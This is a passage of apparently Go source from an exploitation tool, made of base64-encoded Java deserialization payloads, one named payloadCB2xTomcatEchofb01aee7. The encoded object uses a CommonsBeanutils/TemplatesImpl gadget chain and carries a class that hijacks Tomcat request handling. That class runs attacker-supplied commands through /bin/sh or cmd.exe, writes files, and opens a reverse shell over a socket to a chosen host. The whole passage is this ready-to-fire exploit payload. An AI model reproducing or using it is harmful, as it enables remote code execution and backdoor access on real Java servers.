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"
	payloadCB2xTomcatEchofb01aee7 := "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bmcvQ2xhc3M7AQAiTGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uOwEABG5hbWUHATQBAAlTaWduYXR1cmUBACgoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M8Kj47AQAFcHJveHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACGhvc3RJbmZvAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAC3NwbGl0UmVzdWx0AQAFcGFyYW0HAM8BAAV3cml0ZQEAOChMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAQZmlsZU91dHB1dFN0cmVhbQEAGkxqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW07AQAIZmlsZVBhdGgBAAdjb250ZW50AQAEZmlsZQEADkxqYXZhL2lvL0ZpbGU7BwFPAQAKY2xlYXJQYXJhbQEABGV4ZWMBAApleGVjdXRlQ21kAQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAZvdXRwdXQBAAJvcwEAB3Byb2Nlc3MBABNMamF2YS9sYW5nL1Byb2Nlc3M7BwGPBwFqBwFgBwGQAQAHcmV2ZXJzZQEAJyhMamF2YS9sYW5nL1N0cmluZztJKUxqYXZhL2xhbmcvU3RyaW5nOwEACXNoZWxsUGF0aAEAAXABABFMamF2YS9uZXQvU29ja2V0OwEAAnBpAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQACcGUBAAJzaQEAAnBvAQAWTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEAAnNvAQABSQcBdgcBkQcBkgEAA3J1bgEABmRlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBABJiYXNlNjREZWNvZGVyQ2xhc3MBAApnZXREZWNvZGVyAQAYYXBhY2hlQ29tbW9uc0Jhc2U2NENsYXNzAQAfYXBhY2hlQ29tbW9uc0Jhc2U2NERlY29kZU1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAMYmFzZTY0U3RyaW5nAQAMZGVjb2RlZEJ5dGVzAQAKU291cmNlRmlsZQEAB0E0LmphdmEMAJYAlwwBkwGUDAGVAZYMAZcBmAwBmQGaBwGNDAGbAZwMAZ0BngwBnwGgDAGhAaIBAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAHaGFuZGxlcgEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgwBowGYAQAGZ2xvYmFsAQAOamF2YS91dGlsL0xpc3QMAaQBpQcBjgwBpgGnDAGoAakBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwBqgGrAQAQamF2YS9sYW5nL09iamVjdAcBrAwBrQGuAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwwAzADNDAGvAbABAAlzZXRTdGF0dXMHAbEMAbIAngwBswG0AQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rDADFAMYMAbUBqQEACHNldEJ5dGVzDAG2AasBAAdkb1dyaXRlAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAE2phdmEubmlvLkJ5dGVCdWZmZXIBAAR3cmFwDAG3AMYBACBqYXZhL2xhbmcvQ2xhc3NOb3RGb3VuZEV4Y2VwdGlvbgwBuAG5BwG6AQAADAG7AbwBABBjb21tYW5kIG5vdCBudWxsDAG9AaABAAUjIyMjIwwBvgG/AQAHaHR0cDovLwwBwAHBAQAIaHR0cHM6Ly8MANwAzQEAAToMAcIBwwEAImNvbW1hbmQgcmV2ZXJzZSBob3N0IGZvcm1hdCBlcnJvciEMAJIAkwwBxAHFDACUAJUBABBqYXZhL2xhbmcvVGhyZWFkDACWAcYMAccAlwEABSQkJCQkAQASZmlsZSBmb3JtYXQgZXJyb3IhDADTANQBAAVAQEBAQAwA3QDNAQAMamF2YS9pby9GaWxlDACWAcgBABhqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW0MAJYByQwA+gD7DADTAcoMAcsAlwwBzACXDAHNAaAMAc4BoAEAB29zLm5hbWUHAc8MAdAAzQwB0QGgAQADd2luAQAEcGluZwEAAi1uAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAdIB0wEABSAtbiA0AQACL2MBAAUgLXQgNAEAAnNoAQACLWMHAdQMAdUB1gwA3QHXAQARamF2YS91dGlsL1NjYW5uZXIHAY8MAdgB2QwAlgHaAQACXGEMAdsB3AwBqAGgDAHdAdkMAd4AlwEABy9iaW4vc2gBAAdjbWQuZXhlDADdAd8BAA9qYXZhL25ldC9Tb2NrZXQMAJYB4AwB4QHiDAHjAacHAZEMAeQB5QwB5gHlBwGSDADTAecMAegB6QwB6gHlAQAdcmV2ZXJzZSBleGVjdXRlIGVycm9yLCBtc2cgLT4MAesBoAEAASEBABNyZXZlcnNlIGV4ZWN1dGUgb2shDAHsAeUMAOkA6gEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIBAAxkZWNvZGVCdWZmZXIBABBqYXZhLnV0aWwuQmFzZTY0AQAmb3JnLmFwYWNoZS5jb21tb25zLmNvZGVjLmJpbmFyeS5CYXNlNjQBAAJBNAEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQASamF2YS91dGlsL0l0ZXJhdG9yAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2xhbmcvVGhyb3dhYmxlAQATamF2YS9pby9JbnB1dFN0cmVhbQEAFGphdmEvaW8vT3V0cHV0U3RyZWFtAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldEJ5dGVzAQAEKClbQgEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQALbmV3SW5zdGFuY2UBABFnZXREZWNsYXJlZE1ldGhvZAEAB2Zvck5hbWUBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEdHJpbQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAAdyZXBsYWNlAQBEKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylMamF2YS9sYW5nL1N0cmluZzsBAAVzcGxpdAEAJyhMamF2YS9sYW5nL1N0cmluZzspW0xqYXZhL2xhbmcvU3RyaW5nOwEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJAQAXKExqYXZhL2xhbmcvUnVubmFibGU7KVYBAAVzdGFydAEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEShMamF2YS9pby9GaWxlOylWAQAFKFtCKVYBAAVmbHVzaAEABWNsb3NlAQAIdG9TdHJpbmcBAA9nZXRBYnNvbHV0ZVBhdGgBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBAAt0b0xvd2VyQ2FzZQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFu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